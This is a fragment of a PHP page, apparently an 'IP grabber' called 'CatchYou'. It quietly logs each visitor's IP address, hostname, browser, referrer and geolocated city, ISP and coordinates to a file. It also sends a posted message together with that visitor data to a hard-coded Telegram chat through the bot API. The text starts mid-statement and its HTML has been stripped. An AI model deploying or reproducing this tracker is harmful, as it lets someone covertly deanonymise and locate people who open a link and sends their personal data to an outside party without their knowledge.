loc.'","' // latitude, longitude .$details->org.'","' // internet service provider .$details->city.'","' // city .$details->region.'","' // state .$details->country.'","' // country .date("D dS M,Y h:i a").'"' // date ."\n" ; $write = fputs($fileHandle, $string); @ fclose($fileHandle); } $string = '' .'

'.$QUERY_STRING.'

IP address:     ' .$_SERVER['REMOTE_ADDR'].'

Hostname:       ' .$hostname.'

Browser and OS: ' .$_SERVER['HTTP_USER_AGENT'].'

' .$_SERVER['HTTP_REFERER'].'

Coordinates:    ' .$details->loc.'

ISP provider:   ' .$details->org.'

City:           ' .$details->city.'

State:          ' .$details->region.'

Country:        ' .$details->country.'

Date:           ' .date("D dS M,Y h:i a").'

' ; echo 'Who Am I?'; //echo $string; echo ''; echo ''; ?> CatchYou
Msg :
'5431419547', 'text' => 'user :'.$_POST['message']."\n".'IP :'.$_SERVER['REMOTE_ADDR']."\n".'Hostname :'.$hostname."\n".'browzer :'.$_SERVER['HTTP_USER_AGENT']."\n".'city :'.$details->city."\n".'country :'.$details->country."\n".'Date :'.date("D dS M,Y h:i a") ]; $response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" . http_build_query($data) ); } ?>